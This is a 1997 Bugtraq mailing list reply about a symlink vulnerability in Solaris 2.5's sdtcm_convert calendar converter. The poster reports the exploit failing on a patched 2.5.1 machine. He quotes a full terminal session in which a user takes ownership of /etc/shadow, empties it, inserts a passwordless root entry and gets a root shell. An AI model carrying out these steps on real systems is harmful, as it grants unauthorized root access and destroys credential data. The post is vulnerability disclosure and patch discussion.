Bugtraq mailing list archives
Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
From: shuque () SAS UPENN EDU (Shumon Huque)
Date: Sun, 23 Feb 1997 15:40:43 -0500
I don't know what exactly 103670-02 fixed but this exploit didn't work on my machine - 2.5.1, CDE 1.0.2 with 103670-02 applied. The symlink /tmp/calorig.user was removed and replaced by a plain file owned by user.
Is this the bug fixed in the Sun patches: 103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability 103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability 103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version) 103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version) or is it a new one?That's hard to know, since this patch is not publicly available off SunSolve (not right now, anyway). There's at least one other hole in sdtcm_convert which this patch may or not fix. CDE is generally a can of worms. $Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $ Script started on Thu Jul 11 22:15:03 1996 22:15 [wumpus:~] % whoami adam 22:15 [wumpus:~] % ls -l /etc/shadow -r-------- 1 root sys 291 Jul 11 22:14 /etc/shadow 22:15 [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam 22:15 [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam Loading the calendar ... WARNING!! Data will be lost when converting version 4 data format back to version 3 data format. Do you want to continue? (Y/N) [Y] y Doing conversion ... Writing out new file ... Conversion done successfully. Total number of appointments = 0 Number of one-time appointments converted = 0 Number of repeating appointments converted = 0 Number of one-time appointments pruned = 0 Number of repeating appointments pruned = 0 The original file is saved in /tmp/calorig.adam 22:15 [wumpus:~] % ls -l /etc/shadow -r--rw---- 1 adam daemon 3114 Jul 11 22:15 /etc/shadow 22:15 [wumpus:~] % chmod 644 /etc/shadow 22:15 [wumpus:~] % cp /dev/null /etc/shadow cp: overwrite /etc/shadow (y/n)? y 22:15 [wumpus:~] % ls -l /etc/shadow -rw-r--r-- 1 adam daemon 0 Jul 11 22:15 /etc/shadow 22:15 [wumpus:~] % echo "root::6445::::::" >> /etc/shadow 22:16 [wumpus:~] % su # id uid=0(root) gid=1(other) # exit script done on Thu Jul 11 22:16:21 1996 adam?
Current thread:
- Security hole in Solaris 2.5 (sdtcm_convert) + exploit Cristian SCHIPOR (Feb 22)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Casper Dik (Feb 22)
- <Possible follow-ups>
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Adam Morrison (Feb 23)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Shumon Huque (Feb 23)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Brian Parent (Feb 24)
- CIAC Bulletin H-32: HP-UX ppl Core Dump Vulnerability Aleph One (Feb 24)
- IRIX 5.3 /var/rfindd/fsdump - exploit Chris Sheldon (Feb 25)
- Re: IRIX 5.3 /var/rfindd/fsdump - exploit Yuri Volobuev (Feb 25)
- Re[2]: [NTSEC] ! [ADVISORY] Major Security Hole in MS ASP daragh_malone () TELECOM IE (Feb 25)
- ** >= Ascend 5.0A SECURITY ALERT ** Kit Knox (Feb 26)
- Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit Shumon Huque (Feb 23)
- libX11 David Sacerdote (Feb 24)